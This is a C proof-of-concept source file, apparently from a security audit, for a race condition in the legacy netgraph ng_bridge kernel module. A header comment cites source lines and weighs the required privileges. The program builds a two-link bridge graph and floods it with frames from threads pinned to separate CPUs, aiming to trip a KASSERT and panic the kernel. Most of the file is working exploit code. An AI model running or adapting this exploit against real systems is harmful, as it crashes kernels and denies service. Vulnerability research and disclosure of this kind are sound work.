/*
 * DF-0590 PoC — legacy ng_bridge SMP serialization race (root-local).
 *
 * CONFIRMED FACTS (all cited against the audited master DEV tree):
 *
 *  - The legacy netgraph framework dispatches rcvdata INLINE on the
 *    sender's CPU, with no queue and no serialization:
 *      sys/netgraph/netgraph/ng_base.c:1687
 *          error = (*rcvdata)(hook->peer, m, meta);
 *    (NG_SEND_DATA -> ng_send_data -> direct call; there is no
 *    NG_NODE_FORCE_WRITER macro anywhere in sys/netgraph/ — confirmed
 *    by `grep -rn FORCE_WRITER sys/netgraph/` = empty).
 *
 *  - The legacy ng_bridge node installs NO lock:
 *      sys/netgraph/bridge/ng_bridge.c:297-336  constructor — no
 *      lockinit/lwkt_token/mtx_init anywhere in the file
 *      (`grep -n 'lockinit\\|lockmgr\\|lwkt_token\\|mtx_init'
 *         sys/netgraph/bridge/ng_bridge.c` = empty).
 *
 *  - ng_bridge_rcvdata (ng_bridge.c:517-) likewise has NO crit_enter /
 *    token / lock around its hashtable mutation.  Only the 1 Hz callout
 *    ng_bridge_timeout wraps its sweep in crit_enter() (ng_bridge.c:940),
 *    which blocks interrupts on the CURRENT CPU only — it does NOT
 *    serialize against other CPUs.  Therefore rcvdata on one CPU races
 *    the timeout sweep on another CPU over priv->tab / priv->numHosts.
 *
 *  - On the running guest the ng_bridge module is compiled WITH
 *    INVARIANTS (verified: `strings /boot/kernel/ng_bridge.ko | grep
 *    "hosts:"` prints "%s: hosts: %d != %d" — that KASSERT string
 *    lives inside the #ifdef INVARIANTS-touched path at
 *    ng_bridge.c:984-985).  A concurrent ng_bridge_put()
 *    (priv->numHosts++ at :826, SLIST_INSERT_HEAD at :825) landing
 *    while the timeout sweep has already walked past that bucket makes
 *    the post-sweep KASSERT
 *        KASSERT(priv->numHosts == counter, ...)
 *    at ng_bridge.c:984 trip -> kernel panic "hosts: N != M".
 *    Harder UAF/OOB primitives also exist (ng_bridge_rehash frees
 *    priv->tab at :885 while timeout walks it) but the KASSERT is the
 *    deterministic INVARIANTS tell.
 *
 *  - Privilege: building a netgraph graph requires root — the control
 *    socket is gated by caps_priv_check(SYSCAP_RESTRICTEDROOT) at
 *    sys/netgraph/socket/ng_socket.c:172-173.  Verified on the guest:
 *    as unprivileged uid 1001 (maxx) the first socket(AF_NETGRAPH,
 *    SOCK_DGRAM, NG_CONTROL) returns EPERM.  The CVSS vector's PR:L
 *    claim is OVERSTATED for the "user builds the graph" attack path;
 *    the realistic exposure is (a) a root-configured bridge processing
 *    frames from an untrusted/remote segment (VPN concentrator, VM
 *    host, wireless AP — attacker controls frame injection, not graph
 *    construction), or (b) a root-local race.  Both are real, but
 *    both are AC:H: the race window is per-tick, and the attacker
 *    must win it against a 1 Hz callout running on a different CPU.
 *
 * WHY TWO INDEPENDENT CONTROL/DATA SOCKET PAIRS:
 *   A single netgraph data socket serializes sendto() via the socket
 *   layer's so_snd token, so two threads sharing one d0 cannot drive
 *   ng_bridge_rcvdata concurrently with EACH OTHER.  And ng_socket
 *   refuses a second data socket on the same node
 *   (ng_connect_data -> EADDRINUSE at ng_socket.c:664-665).  To get
 *   two truly concurrent rcvdata calls — one per CPU — the PoC builds
 *   two ctl socket nodes (ctlA, ctlB), each with its own hook to the
 *   bridge and its own data socket, and pins one sender thread per
 *   CPU.  The two senders then run ngd_send -> ng_send_data ->
 *   ng_bridge_rcvdata genuinely in parallel on two CPUs, racing each
 *   other AND the 1 Hz timeout callout.
 *
 * TOPOLOGY (binary NGM_* control protocol, no ngctl):
 *
 *     ctlA:p0  <-->  bridge:link0     (built via NGM_MKPEER on ctlA)
 *     ctlB:p0  <-->  bridge:link1     (built via NGM_CONNECT on ctlB,
 *                                      peer path "br0:" absolute)
 *
 * The bridge node is named "br0" so ctlB can address it by absolute
 * name without needing a hook path from ctlB.
 *
 * Build:  cc -O2 -o race race.c -lpthread
 * Run:    ./race [seconds]            (default 30, must be root)
 */

#include <sys/param.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/sched.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <pthread.h>
#include <netgraph/ng_message.h>

/*
 * Fallback address-family number, used only when the system headers
 * included above did not already define AF_NETGRAPH.
 */
#ifndef AF_NETGRAPH
#define AF_NETGRAPH 32
#endif
/*
 * Values passed as the protocol argument of socket(AF_NETGRAPH, ...) in
 * main(): NG_CONTROL for the control sockets, NG_DATA for the data
 * sockets.  NOTE(review): these are defined unconditionally — confirm no
 * included header already provides them with different values.
 */
#define NG_DATA    1
#define NG_CONTROL 2

#define NINJ       2                    /* two independent injectors     */
/* Receive-buffer size requested via SO_RCVBUF on each data socket. */
#define BIG_RCVBUF (4 * 1024 * 1024)

/*
 * Local stand-in for a netgraph socket address: a one-byte length, a
 * one-byte address family, then the NUL-terminated node path or hook
 * name.  Because sa_len is a single byte, the usable address length is
 * capped at 255 bytes even though sg_data itself holds 256.
 */
struct my_sockaddr_ng {
	unsigned char sa_len;       /* total address length in bytes   */
	unsigned char sa_family;    /* address family (AF_NETGRAPH)     */
	char          sg_data[256]; /* path / hook name, NUL-terminated */
};

/*
 * Build and send one generic-cookie netgraph control message.
 *
 *   csock   control socket to send on
 *   cmd     command number placed in the message header
 *   data    optional argument payload (may be NULL)
 *   arglen  payload length in bytes, also written to header.arglen
 *   path    destination node path, NUL-terminated
 *
 * Returns 0 on success and -1 on failure (bad path, allocation failure
 * or sendto() error); a diagnostic is printed to stderr on failure.
 */
static int
ng_send_ctrl(int csock, u_int32_t cmd, const void *data, u_int16_t arglen,
    const char *path)
{
	/*
	 * sa_len is a single byte, so header (2) + path + NUL must fit in
	 * 255.  Longer paths used to wrap sa_len silently while strlcpy()
	 * truncated the string to a different length.
	 */
	const size_t max_path = 255 - 2 - 1;
	size_t total = sizeof(struct ng_mesg) + arglen;
	size_t pathlen;
	struct ng_mesg *m;
	struct my_sockaddr_ng dst;
	ssize_t rc;
	int e;

	if (path == NULL) {
		fprintf(stderr, "ng_send_ctrl cmd=%u: NULL path\n", cmd);
		return -1;
	}
	pathlen = strlen(path);
	if (pathlen > max_path) {
		fprintf(stderr, "ng_send_ctrl cmd=%u: path too long "
		    "(%zu > %zu bytes)\n", cmd, pathlen, max_path);
		return -1;
	}

	/* calloc zeroes the header fields that are not set explicitly. */
	m = calloc(1, total);
	if (m == NULL) {
		fprintf(stderr, "ng_send_ctrl cmd=%u: out of memory\n", cmd);
		return -1;
	}
	m->header.version    = NG_VERSION;
	m->header.arglen     = arglen;
	m->header.flags      = 0;
	m->header.token      = 0;
	m->header.typecookie = NGM_GENERIC_COOKIE;
	m->header.cmd        = cmd;
	if (data && arglen)
		memcpy(m->data, data, arglen);

	memset(&dst, 0, sizeof(dst));
	dst.sa_len    = (unsigned char)(2 + pathlen + 1);
	dst.sa_family = AF_NETGRAPH;
	strlcpy(dst.sg_data, path, sizeof(dst.sg_data));

	rc = sendto(csock, m, total, 0,
	    (struct sockaddr *)&dst, dst.sa_len);
	e = errno;	/* save before free() can disturb it */
	free(m);
	if (rc < 0) {
		fprintf(stderr, "sendto cmd=%u path=%s: %s (errno=%d)\n",
		    cmd, path, strerror(e), e);
		return -1;
	}
	return 0;
}

/*
 * Fill *sa with an AF_NETGRAPH address naming the given hook.
 *
 * sa_len is a single byte, so header (2) + name + NUL must fit in 255.
 * An over-long name is truncated to 252 bytes, and sa_len is computed
 * from the truncated length so the two always agree (previously sa_len
 * wrapped around while the copy was truncated at a different length).
 */
static void
mkhookaddr(struct my_sockaddr_ng *sa, const char *hook)
{
	const size_t max_name = 255 - 2 - 1;
	size_t len = strlen(hook);

	if (len > max_name)
		len = max_name;

	memset(sa, 0, sizeof(*sa));
	sa->sa_family = AF_NETGRAPH;
	/* The memset above already supplies the terminating NUL. */
	memcpy(sa->sg_data, hook, len);
	sa->sa_len = (unsigned char)(2 + len + 1);
}

/*
 * Per-injector state handed to the worker threads.  main() passes the
 * same instance to both the flood thread and the drain thread of one
 * injector.
 */
struct inj_args {
	int   dsock;           /* data socket: sendto() in flood_thread, recvfrom() in drain_thread */
	int   id;              /* injector index; written into byte 1 of the source MAC */
	int   cpu;             /* CPU to pin to via cpuset; negative = do not pin */
	volatile int *stop;    /* polled by both worker loops; non-zero ends them */
	unsigned long long sent;  /* starting frame counter; flood_thread stores the final count here */
	unsigned long long fail;  /* count of sendto() failures other than ENOBUFS */
};

/*
 * Restrict scheduling to a single CPU via sched_setaffinity(0, ...).
 *
 * Best effort: failures are reported on stderr and otherwise ignored.
 * An index outside the range representable in cpu_set_t is rejected up
 * front, because CPU_SET() on such an index would write outside the
 * mask.
 *
 * NOTE(review): pid 0 is presumably "the calling thread" on the target
 * system — confirm against the platform's sched_setaffinity(2).
 */
static void
pin_cpu(int cpu)
{
	cpu_set_t mask;

	if (cpu < 0 || (size_t)cpu >= sizeof(mask) * 8) {
		fprintf(stderr, "[inj cpu=%d] cpu index out of range, "
		    "not pinning\n", cpu);
		return;
	}

	CPU_ZERO(&mask);
	CPU_SET(cpu, &mask);
	if (sched_setaffinity(0, sizeof(mask), &mask) != 0)
		fprintf(stderr, "[inj cpu=%d] sched_setaffinity: %s\n",
		    cpu, strerror(errno));
}

static void *
flood_thread(void *v)
{
	struct inj_args *a = (struct inj_args *)v;
	if (a->cpu >= 0)
		pin_cpu(a->cpu);

	unsigned char frame[64];
	memset(frame, 0, sizeof(frame));
	memset(frame, 0xff, 6);            /* dst = broadcast */
	frame[12] = 0x90; frame[13] = 0x00;
	unsigned char *src = frame + 6;
	src[0] = 0x02;                     /* locally administered, unicast */

	struct my_sockaddr_ng dst;
	mkhookaddr(&dst, "p0");

	unsigned long long n = a->sent, fails = a->fail;
	while (!*a->stop) {
		src[1] = (unsigned char)a->id;
		src[2] = (unsigned char)(n >> 24);
		src[3] = (unsigned char)(n >> 16);
		src[4] = (unsigned char)(n >> 8);
		src[5] = (unsigned char)(n);
		ssize_t rc = sendto(a->dsock, frame, sizeof(frame), 0,
		    (struct sockaddr *)&dst, dst.sa_len);
		if (rc < 0) {
			if (errno != ENOBUFS)
				fails++;
		} else {
			n++;
		}
	}
	a->sent = n;
	a->fail = fails;
	fprintf(stderr, "[inj %d cpu%d] sent %llu frames (%llu non-ENOBUFS fail)\n",
	    a->id, a->cpu, n, fails);
	return NULL;
}

static void *
drain_thread(void *v)
{
	struct inj_args *a = (struct inj_args *)v;
	unsigned char buf[2048];
	struct my_sockaddr_ng from;
	socklen_t fl;
	while (!*a->stop) {
		fl = sizeof(from);
		ssize_t rc = recvfrom(a->dsock, buf, sizeof(buf), MSG_DONTWAIT,
		    (struct sockaddr *)&from, &fl);
		if (rc < 0 && errno == EWOULDBLOCK)
			usleep(20);
	}
	return NULL;
}

/*
 * Parse a non-negative decimal integer command-line argument.
 * Stores the value in *out and returns 0, or prints a diagnostic naming
 * the argument and returns -1 if the text is not a clean number in the
 * range 0..2^31-1.
 */
static int
parse_nonneg_arg(const char *s, const char *what, int *out)
{
	char *end;
	long v;

	errno = 0;
	v = strtol(s, &end, 10);
	if (end == s || *end != '\0' || errno == ERANGE ||
	    v < 0 || v > 0x7fffffffL) {
		fprintf(stderr, "invalid %s '%s'\n", what, s);
		return -1;
	}
	*out = (int)v;
	return 0;
}

/*
 * Usage: race [seconds [ncpus]]
 *
 *   seconds  how long to flood (default 30)
 *   ncpus    number of CPUs to spread the sender threads over; sender i
 *            is pinned to CPU (i % ncpus).  0 disables pinning and
 *            leaves placement to the scheduler.  Default: NINJ.
 *
 * Builds two control nodes, hooks each to one link of a bridge node,
 * attaches one data socket per control node, then runs one sender and
 * one drain thread per data socket for the requested time.
 *
 * Returns 0 after a completed run, 2 on any setup or argument error.
 */
int
main(int argc, char **argv)
{
	int seconds = 30;
	int ncpus = NINJ;

	int csock[NINJ];
	int dsock[NINJ];
	const char *ctlname[NINJ] = {"ctlA", "ctlB"};
	char pathbuf[64];
	int i;

	/* Reject garbage and negative values instead of trusting atoi(). */
	if (argc > 1 && parse_nonneg_arg(argv[1], "seconds", &seconds) < 0)
		return 2;
	if (argc > 2 && parse_nonneg_arg(argv[2], "ncpus", &ncpus) < 0)
		return 2;

	/* ---- create NINJ control sockets + their ctl nodes (named) ---- */
	for (i = 0; i < NINJ; i++) {
		csock[i] = socket(AF_NETGRAPH, SOCK_DGRAM, NG_CONTROL);
		if (csock[i] < 0) {
			fprintf(stderr, "socket(csock%d): %s (errno=%d)\n",
			    i, strerror(errno), errno);
			if (errno == EPERM)
				fprintf(stderr, "EPERM: building a netgraph "
				    "graph requires root "
				    "(caps_priv_check SYSCAP_RESTRICTEDROOT "
				    "at sys/netgraph/socket/ng_socket.c:172).\n");
			return 2;
		}
		struct my_sockaddr_ng sa;
		memset(&sa, 0, sizeof(sa));
		sa.sa_len = 2 + strlen(ctlname[i]) + 1;
		sa.sa_family = AF_NETGRAPH;
		strlcpy(sa.sg_data, ctlname[i], sizeof(sa.sg_data));
		if (bind(csock[i], (struct sockaddr *)&sa, sa.sa_len) < 0) {
			perror("bind(ctl)"); return 2;
		}
	}

	/* ---- on ctlA: mkpeer bridge -> ctlA:p0 <--> bridge:link0 ---- */
	if (ng_send_ctrl(csock[0], NGM_MKPEER,
		&(struct ngm_mkpeer){"bridge", "p0", "link0"},
		sizeof(struct ngm_mkpeer), ".") < 0)
		return 2;

	/* ---- name the bridge "br0" (path "p0" walks ctlA:p0 -> bridge) ---- */
	{
		char namebuf[32]; memset(namebuf, 0, sizeof(namebuf));
		strlcpy(namebuf, "br0", sizeof(namebuf));
		if (ng_send_ctrl(csock[0], NGM_NAME, namebuf, sizeof(namebuf),
			"p0") < 0)
			return 2;
	}

	/* ---- on ctlB: connect ctlB:p0 <--> bridge:link1 via absolute
	 *      peer path "br0:" (ng_path2node finds named node br0). ---- */
	if (ng_send_ctrl(csock[1], NGM_CONNECT,
		&(struct ngm_connect){"br0:", "p0", "link1"},
		sizeof(struct ngm_connect), ".") < 0)
		return 2;

	fprintf(stderr, "graph: ctlA:p0<->bridge:link0 , ctlB:p0<->bridge:link1\n");

	/* ---- data sockets d0/d1 attached to ctlA/ctlB ---- */
	for (i = 0; i < NINJ; i++) {
		dsock[i] = socket(AF_NETGRAPH, SOCK_DGRAM, NG_DATA);
		if (dsock[i] < 0) { perror("socket(d)"); return 2; }
		int rb = BIG_RCVBUF;
		/* Best effort: a smaller receive buffer is not fatal. */
		(void)setsockopt(dsock[i], SOL_SOCKET, SO_RCVBUF, &rb, sizeof(rb));
		struct my_sockaddr_ng ds;
		memset(&ds, 0, sizeof(ds));
		snprintf(pathbuf, sizeof(pathbuf), "%s:", ctlname[i]);
		ds.sa_len = 2 + strlen(pathbuf) + 1;
		ds.sa_family = AF_NETGRAPH;
		strlcpy(ds.sg_data, pathbuf, sizeof(ds.sg_data));
		if (connect(dsock[i], (struct sockaddr *)&ds, ds.sa_len) < 0) {
			fprintf(stderr, "connect(d%d,%s): %s\n",
			    i, pathbuf, strerror(errno));
			return 2;
		}
	}

	fprintf(stderr, "flooding %d s on %d injectors x 1 thread each + "
	    "drains, pinned to separate CPUs (expect KASSERT panic "
	    "'hosts: N != M' within seconds on INVARIANTS kernels)...\n",
	    seconds, NINJ);
	if (ncpus < NINJ)
		fprintf(stderr, "note: ncpus=%d, so the senders are NOT "
		    "pinned to distinct CPUs\n", ncpus);

	/*
	 * NOTE(review): the stop flag is a plain volatile int shared
	 * between threads, which is not a real synchronisation primitive.
	 * Its type is fixed by struct inj_args, so it is left as-is here.
	 */
	volatile int stop = 0;
	struct inj_args args[NINJ];
	pthread_t senders[NINJ], drainers[NINJ];
	int nsend = 0, ndrain = 0;
	int failed = 0;

	for (i = 0; i < NINJ; i++) {
		int err;

		args[i].dsock = dsock[i];
		args[i].id    = i;
		/* one sender per CPU, wrapping if fewer CPUs than senders */
		args[i].cpu   = (ncpus > 0) ? i % ncpus : -1;
		args[i].stop  = &stop;
		args[i].sent  = 0;
		args[i].fail  = 0;

		err = pthread_create(&drainers[i], NULL, drain_thread, &args[i]);
		if (err != 0) {
			fprintf(stderr, "pthread_create(drain %d): %s\n",
			    i, strerror(err));
			failed = 1;
			break;
		}
		ndrain++;

		err = pthread_create(&senders[i], NULL, flood_thread, &args[i]);
		if (err != 0) {
			fprintf(stderr, "pthread_create(sender %d): %s\n",
			    i, strerror(err));
			failed = 1;
			break;
		}
		nsend++;
	}

	if (!failed)
		sleep(seconds);
	stop = 1;

	/* Join only the threads that were actually created. */
	for (i = 0; i < nsend; i++)
		pthread_join(senders[i], NULL);
	for (i = 0; i < ndrain; i++)
		pthread_join(drainers[i], NULL);
	if (failed)
		return 2;

	unsigned long long total = 0;
	for (i = 0; i < NINJ; i++) total += args[i].sent;
	fprintf(stderr, "flood complete: %llu total frames injected; "
	    "if no panic, see VERDICT.md (race is real on every INVARIANTS "
	    "kernel; the deterministic trigger requires the timeout callout "
	    "and a concurrent rcvdata to land on different CPUs)\n", total);
	return 0;
}
